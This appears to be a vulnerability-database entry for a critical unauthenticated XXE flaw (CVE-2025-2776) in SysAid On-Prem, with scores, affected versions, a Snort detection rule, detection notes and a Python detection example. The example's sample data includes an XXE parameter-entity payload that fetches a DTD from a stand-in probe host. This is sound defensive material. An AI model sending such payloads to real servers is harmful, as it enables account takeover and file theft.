cbcvebase.
CVE-2025-2776
published 2025-05-07

Priority P1 · 97 · critical · 9.8 CVSS 3.1
Vector: AV:N AC:L PR:N UI:N S:U C:H I:H A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2025-08-12
Exploited in the wild
EPSS: 72.97% (99.4th percentile)
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.

Affected (2 ranges)

Vendor   Product          Version range   Fixed in
sysaid   sysaid           <= 23.3.40      -
sysaid   sysaid_on-prem   <= 23.3.40      -

Detection & IOCs (extracted from sources)

url: /mdm/serverurl
bytes: |3c 21|ENTITY|20 25|
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem serverurl XML External Entity Injection (CVE-2025-2776)"; flow:established,to_server; http.uri; content:"/mdm/serverurl"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2776; classtype:web-application-attack; sid:2066206; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit traffic targets HTTP POST requests to the /mdm/serverurl endpoint on SysAid On-Prem servers; monitor for this URI with XML entity injection patterns in the request body.
  • Out-of-band XXE exploitation can be detected via SSRF callbacks; look for outbound HTTP requests with a Java User-Agent originating from the SysAid server, indicating a triggered external entity fetch.
  • The vulnerability is unauthenticated and resides in the Server URL processing functionality; no prior authentication is required to trigger the XXE, so any external access to /mdm/serverurl should be treated as suspicious.
  • MITRE ATT&CK mapping: Initial Access via Exploit Public-Facing Application (T1190, TA0001); correlate SysAid exploitation attempts with subsequent lateral movement or credential access activity.
  • The Snort/ET rule (sid:2066206) requires TLS decryption to be effective against HTTPS-protected SysAid instances, as indicated by the TLSDecrypt deployment metadata.
  • The Nuclei/interactsh-based detection relies on out-of-band callback infrastructure; it will only fire if the SysAid server can make outbound HTTP connections to the probe host.
  • Patched version is SysAid On-Prem 24.4.60; all instances on versions <= 23.3.40 remain vulnerable. Verify the installed version before assuming coverage.
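As an added example (not code from this page or from SysAid), the detection notes above expressed as two Python checks: one that applies the same conditions as the Snort rule to a parsed inbound request, and one that flags the out-of-band Java User-Agent callback in an outbound proxy log. The proxy log format, host addresses, URLs and sample bodies are constructed for the example.

```python
import re
from dataclasses import dataclass

@dataclass
class HttpRequest:
    method: str
    uri: str   # request path
    body: str  # decoded request body

# "|3c 21|ENTITY|20 25|" in the Snort rule is the byte sequence '<!ENTITY %', a
# parameter-entity declaration; "SYSTEM" at distance:0 must then appear later.
PARAM_ENTITY_RE = re.compile(r"<!ENTITY %.*?SYSTEM", re.DOTALL)

def matches_serverurl_xxe(req: HttpRequest) -> bool:
    """Same conditions as sid:2066206: POST, URI starting with /mdm/serverurl,
    '<!ENTITY %' followed by SYSTEM in the body (needs decrypted traffic)."""
    return (req.method.upper() == "POST"
            and req.uri.startswith("/mdm/serverurl")
            and PARAM_ENTITY_RE.search(req.body) is not None)

# Assumed proxy log line format (constructed, not a real product's):
#   <src_ip> <method> <url> ua="<user-agent>"
PROXY_LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) ua="([^"]*)"$')

def is_sysaid_oob_callback(line: str, sysaid_hosts: set) -> bool:
    """Outbound HTTP from a SysAid server with a Java User-Agent: the external
    entity fetch the detection notes describe (only fires if egress is allowed)."""
    m = PROXY_LINE_RE.match(line)
    if not m:
        return False
    src, _method, _url, ua = m.groups()
    return src in sysaid_hosts and ua.startswith("Java/")

# Constructed samples: parameter entity on the vulnerable endpoint, a benign
# serverurl body, and the same pattern on a GET (outside the rule's scope).
SAMPLE_REQUESTS = [
    HttpRequest("POST", "/mdm/serverurl",
                '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://probe.example.invalid/p.dtd">]>'),
    HttpRequest("POST", "/mdm/serverurl", "<serverurl>https://sysaid.example.com</serverurl>"),
    HttpRequest("GET", "/mdm/serverurl", '<!ENTITY % p SYSTEM "http://probe.example.invalid/p.dtd">'),
]
SAMPLE_PROXY_LINES = [
    '10.0.0.5 GET http://probe.example.invalid/p.dtd ua="Java/11.0.2"',
    '10.0.0.7 GET https://www.example.com/ ua="Mozilla/5.0"',
]

if __name__ == "__main__":
    print([matches_serverurl_xxe(r) for r in SAMPLE_REQUESTS])                     # [True, False, False]
    print([is_sysaid_oob_callback(l, {"10.0.0.5"}) for l in SAMPLE_PROXY_LINES])   # [True, False]
```

The request check only matches the exact byte sequence the rule matches, so like the rule it will not see traffic that is still TLS-encrypted or that uses a different entity spelling.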

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.3 CRITICAL
CISA: 9.8 CRITICAL